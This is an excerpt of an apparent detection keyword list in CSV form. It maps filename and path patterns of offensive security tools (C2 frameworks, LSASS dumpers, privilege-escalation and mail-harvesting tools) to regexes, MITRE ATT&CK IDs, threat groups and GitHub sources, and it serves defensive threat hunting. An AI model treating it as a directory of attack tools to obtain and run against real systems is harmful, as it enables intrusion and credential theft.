"*/MacroMeter*",".{0,1000}\/MacroMeter.{0,1000}","offensive_tool_keyword","MacroMeter","VBA Reversed TCP Meterpreter Stager CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw https://github.com/tyranid/DotNetToJScript","T1027 - T1059 - T1564 - T1071","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/Cn33liz/MacroMeter","1","0","N/A","N/A","N/A","10","62","22","2018-04-23T09:14:49Z","2017-05-16T20:04:41Z","8686"
"*/MacroPatterns.cs*",".{0,1000}\/MacroPatterns\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","8687"
"*/Macro-Payloads.py*",".{0,1000}\/Macro\-Payloads\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","8688"
"*/MacroWord_Payload/macro.txt*",".{0,1000}\/MacroWord_Payload\/macro\.txt.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","8689"
"*/magnitude.profile*",".{0,1000}\/magnitude\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","8690"
"*/mailpv.exe*",".{0,1000}\/mailpv\.exe.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","8691"
"*/MailRaider.ps1*",".{0,1000}\/MailRaider\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","8692"
"*/MailRaider.ps1*",".{0,1000}\/MailRaider\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1129","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","8693"
"*/MailSniper/*",".{0,1000}\/MailSniper\/.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","8694"
"*/main/cve-2022-0847.c*",".{0,1000}\/main\/cve\-2022\-0847\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z","8695"
"*/main/exploit.js",".{0,1000}\/main\/exploit\.js","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","N/A","3","272","58","2023-12-05T12:21:02Z","2023-01-30T12:57:48Z","8696"
"*/main/exploit.pdf",".{0,1000}\/main\/exploit\.pdf","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","N/A","3","272","58","2023-12-05T12:21:02Z","2023-01-30T12:57:48Z","8697"
"*/Maitm/Bells.py*",".{0,1000}\/Maitm\/Bells\.py.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#linux","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","8698"
"*/MakeMeAdmin * x64.msi*",".{0,1000}\/MakeMeAdmin\s.{0,1000}\sx64\.msi.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","8699"
"*/MakeMeAdmin.git*",".{0,1000}\/MakeMeAdmin\.git.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","8700"
"*/MakeMeAdmin/tarball*",".{0,1000}\/MakeMeAdmin\/tarball.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","8701"
"*/MakeMeAdmin/tree/v*/Installers*",".{0,1000}\/MakeMeAdmin\/tree\/v.{0,1000}\/Installers.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","8702"
"*/MakeMeAdmin/zipball*",".{0,1000}\/MakeMeAdmin\/zipball.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","8703"
"*/MakeMeEnterpriseAdmin.ps1*",".{0,1000}\/MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","8704"
"*/MakeMeEnterpriseAdmin.ps1*",".{0,1000}\/MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","8705"
"*/MakeMeEnterpriseAdmin.ps1*",".{0,1000}\/MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","8706"
"*/malDll.dll*",".{0,1000}\/malDll\.dll.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","8707"
"*/MaliciousMacroMSBuild*",".{0,1000}\/MaliciousMacroMSBuild.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","8708"
"*/malleable-c2*",".{0,1000}\/malleable\-c2.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","8709"
"*/MalSCCM.git*",".{0,1000}\/MalSCCM\.git.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","1","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","8710"
"*/MalSCCM.sln*",".{0,1000}\/MalSCCM\.sln.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","1","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","8711"
"*/malseclogon.*",".{0,1000}\/malseclogon\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","8712"
"*/MalStuff.cpp*",".{0,1000}\/MalStuff\.cpp.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","8713"
"*/man_in_the_browser/*.js*",".{0,1000}\/man_in_the_browser\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","8714"
"*/man_in_the_browser/*.rb*",".{0,1000}\/man_in_the_browser\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","8715"
"*/manage/exec_cmd*",".{0,1000}\/manage\/exec_cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8716"
"*/Management/C2/*",".{0,1000}\/Management\/C2\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","8717"
"*/manjusaka/plugins*",".{0,1000}\/manjusaka\/plugins.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","8718"
"*/MANSPIDER.git*",".{0,1000}\/MANSPIDER\.git.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","8719"
"*/manspider_*.log*",".{0,1000}\/manspider_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","#linux","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","8720"
"*/manspider_output*.txt",".{0,1000}\/manspider_output.{0,1000}\.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8721"
"*/manspiderDump*",".{0,1000}\/manspiderDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8722"
"*/Mara.git*",".{0,1000}\/Mara\.git.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","1","N/A","N/A","9","1","53","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z","8723"
"*/masky.py*",".{0,1000}\/masky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8724"
"*/master/GPSCoordinates/*",".{0,1000}\/master\/GPSCoordinates\/.{0,1000}","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","8725"
"*/master/JunctionFolder/*",".{0,1000}\/master\/JunctionFolder\/.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","8726"
"*/master/PhantomService/*",".{0,1000}\/master\/PhantomService\/.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","8727"
"*/master/windows/klog_main.cpp*",".{0,1000}\/master\/windows\/klog_main\.cpp.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","8728"
"*/maxdb-info.nse*",".{0,1000}\/maxdb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8729"
"*/mcafee-epo-agent.nse*",".{0,1000}\/mcafee\-epo\-agent\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8730"
"*/md5cracker.rb*",".{0,1000}\/md5cracker\.rb.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","8731"
"*/MDE_Enum.git*",".{0,1000}\/MDE_Enum\.git.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","1","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","8732"
"*/MDExclusionParser.git*",".{0,1000}\/MDExclusionParser\.git.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","1","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","8733"
